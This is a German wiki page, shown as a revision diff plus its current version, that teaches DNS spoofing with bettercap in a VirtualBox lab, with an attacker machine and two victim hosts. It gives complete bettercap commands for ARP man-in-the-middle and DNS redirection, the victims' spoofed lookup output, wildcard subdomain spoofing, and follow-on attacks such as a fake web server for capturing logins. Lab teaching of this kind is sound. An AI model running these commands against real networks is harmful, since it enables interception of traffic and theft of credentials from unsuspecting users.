DNS Spoofing mit bettercap: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
 
(Eine dazwischenliegende Version desselben Benutzers wird nicht angezeigt)
Zeile 1: Zeile 1:
 
= DNS Spoofing mit bettercap =
 
= DNS Spoofing mit bettercap =
 +
== Umgebung ==
 +
KALI    = 192.168.16.101  (Angreifer)
 +
ALICE  = 192.168.16.131  (Opfer 1)
 +
BOB    = 192.168.16.132  (Opfer 2)
 +
ZIEL    = xinux.de        (echte IP: 94.130.248.215)
 +
FAKE-IP = 192.168.16.101  (Kali täuscht vor xinux.de zu sein)
  
== Vorbereitung ==
+
== Vorbereitung auf Alice und Bob ==
<pre>
+
;Echte IP prüfen (vor dem Angriff)
# bettercap installieren (Debian/Ubuntu)
+
host -4 xinux.de
sudo apt update && sudo apt install bettercap -y
+
xinux.de has address 94.130.248.215
</pre>
 
  
== Opfer-Überprüfung ==
+
== Angreifer - bettercap starten ==
<pre>
+
sudo bettercap -iface eth0
# Echte IP der Zieldomain prüfen
 
host -4 xinux.de
 
# Erwartete Ausgabe: xinux.de has address 94.130.248.215
 
</pre>
 
  
== Angreifer-Konfiguration ==
+
== In der bettercap-Konsole ==
<pre>
+
;ARP MITM + DNS Spoofing kombiniert
# 1. DNS-Spoofing-Regel erstellen
+
set arp.spoof.targets 192.168.16.131,192.168.16.132
echo '*.xinux.de 10.0.10.101' | sudo tee -a /usr/local/share/bettercap/caplets/dns-spoof.cap
+
set arp.spoof.internal true
 +
set arp.spoof.fullduplex true
 +
set dns.spoof.domains xinux.de
 +
set dns.spoof.address 192.168.16.101
 +
arp.spoof on
 +
dns.spoof on
 +
net.sniff on
  
# 2. Bettercap starten (ARP MITM + DNS Spoofing)
+
== Optionen ==
sudo bettercap -iface eth0 \
+
* set arp.spoof.targets       → Alice und Bob als Ziele
    -eval "set arp.spoof.targets 10.0.10.104; set dns.spoof.domains ~xinux.de; dns.spoof on; arp.spoof on; net.sniff on"
+
* set arp.spoof.internal true  → Host-zu-Host Spoofing
</pre>
+
* set arp.spoof.fullduplex true → beide Hosts werden getäuscht
 +
* set dns.spoof.domains       → welche Domain gefälscht wird
 +
* set dns.spoof.address        → wohin die Domain umgeleitet wird
 +
* arp.spoof on                 → ARP Spoofing aktivieren (MITM Voraussetzung)
 +
* dns.spoof on                 → DNS Spoofing aktivieren
 +
* net.sniff on                 → Paketmitschnitt aktivieren
  
== Alternative mit Caplet ==
+
== Test auf Alice ==
<pre>
+
;Nach dem Angriff - gefälschte IP wird zurückgegeben
# dns-spoof.cap erstellen
+
host -4 xinux.de
echo -e "set arp.spoof.targets 10.0.10.102\nset dns.spoof.domains ~xinux.de\ndns.spoof on\narp.spoof on\nnet.sniff on" | sudo tee /usr/local/share/bettercap/caplets/dns-spoof.cap
+
xinux.de has address 192.168.16.101
  
# Ausführen
+
ping xinux.de
sudo bettercap -iface eth0 -caplet dns-spoof
+
PING xinux.de (192.168.16.101)...
</pre>
 
  
== Opfer-Test ==
+
== Test auf Bob ==
<pre>
+
;Gleiches Ergebnis auf Bob
# Auf dem Opfergerät testen
+
host -4 xinux.de
ping xinux.de
+
xinux.de has address 192.168.16.101
# Erwartete Ausgabe: PING xinux.de (10.0.10.101)...
 
</pre>
 
  
== Parameter-Erklärung ==
+
== Wildcard - alle Subdomains abfangen ==
* <code>~xinux.de</code> - Fängt alle Subdomains ab (Wildcard)
+
;Alle Subdomains von xinux.de ebenfalls umleiten
* <code>10.0.10.102</code> - IP des Opfers
+
set dns.spoof.domains *.xinux.de,xinux.de
* <code>10.0.10.101</code> - IP des Angreifers
+
 
* <code>-iface eth0</code> - Netzwerkinterface
+
== Hinweis zur Netzwerkumgebung ==
</pre>
+
* Getestet mit VirtualBox '''Internal Network'''
 +
* Bei '''Bridge-Adapter''' kann das Gateway ARP-Replies überschreiben
 +
* Empfehlung für das Labor: VirtualBox Internal Network verwenden
 +
 
 +
== Mögliche Folgeangriffe ==
 +
* [[mitmproxy]] für HTTP(S)-Manipulation
 +
* [[Fake Webserver]] zum Abfangen von Zugangsdaten
 +
* [[Ngrep]] zur Paketanalyse

Aktuelle Version vom 11. Mai 2026, 15:11 Uhr

DNS Spoofing mit bettercap

Umgebung

KALI    = 192.168.16.101  (Angreifer)
ALICE   = 192.168.16.131  (Opfer 1)
BOB     = 192.168.16.132  (Opfer 2)
ZIEL    = xinux.de        (echte IP: 94.130.248.215)
FAKE-IP = 192.168.16.101  (Kali täuscht vor xinux.de zu sein)

Vorbereitung auf Alice und Bob

Echte IP prüfen (vor dem Angriff)
host -4 xinux.de
xinux.de has address 94.130.248.215

Angreifer - bettercap starten

sudo bettercap -iface eth0

In der bettercap-Konsole

ARP MITM + DNS Spoofing kombiniert
set arp.spoof.targets 192.168.16.131,192.168.16.132
set arp.spoof.internal true
set arp.spoof.fullduplex true
set dns.spoof.domains xinux.de
set dns.spoof.address 192.168.16.101
arp.spoof on
dns.spoof on
net.sniff on

Optionen

  • set arp.spoof.targets → Alice und Bob als Ziele
  • set arp.spoof.internal true → Host-zu-Host Spoofing
  • set arp.spoof.fullduplex true → beide Hosts werden getäuscht
  • set dns.spoof.domains → welche Domain gefälscht wird
  • set dns.spoof.address → wohin die Domain umgeleitet wird
  • arp.spoof on → ARP Spoofing aktivieren (MITM Voraussetzung)
  • dns.spoof on → DNS Spoofing aktivieren
  • net.sniff on → Paketmitschnitt aktivieren

Test auf Alice

Nach dem Angriff - gefälschte IP wird zurückgegeben
host -4 xinux.de
xinux.de has address 192.168.16.101

ping xinux.de
PING xinux.de (192.168.16.101)...

Test auf Bob

Gleiches Ergebnis auf Bob
host -4 xinux.de
xinux.de has address 192.168.16.101

Wildcard - alle Subdomains abfangen

Alle Subdomains von xinux.de ebenfalls umleiten
set dns.spoof.domains *.xinux.de,xinux.de

Hinweis zur Netzwerkumgebung

  • Getestet mit VirtualBox Internal Network
  • Bei Bridge-Adapter kann das Gateway ARP-Replies überschreiben
  • Empfehlung für das Labor: VirtualBox Internal Network verwenden

Mögliche Folgeangriffe

Abgerufen von „http://wiki.ixheim.de/index.php?title=DNS_Spoofing_mit_bettercap&oldid=69928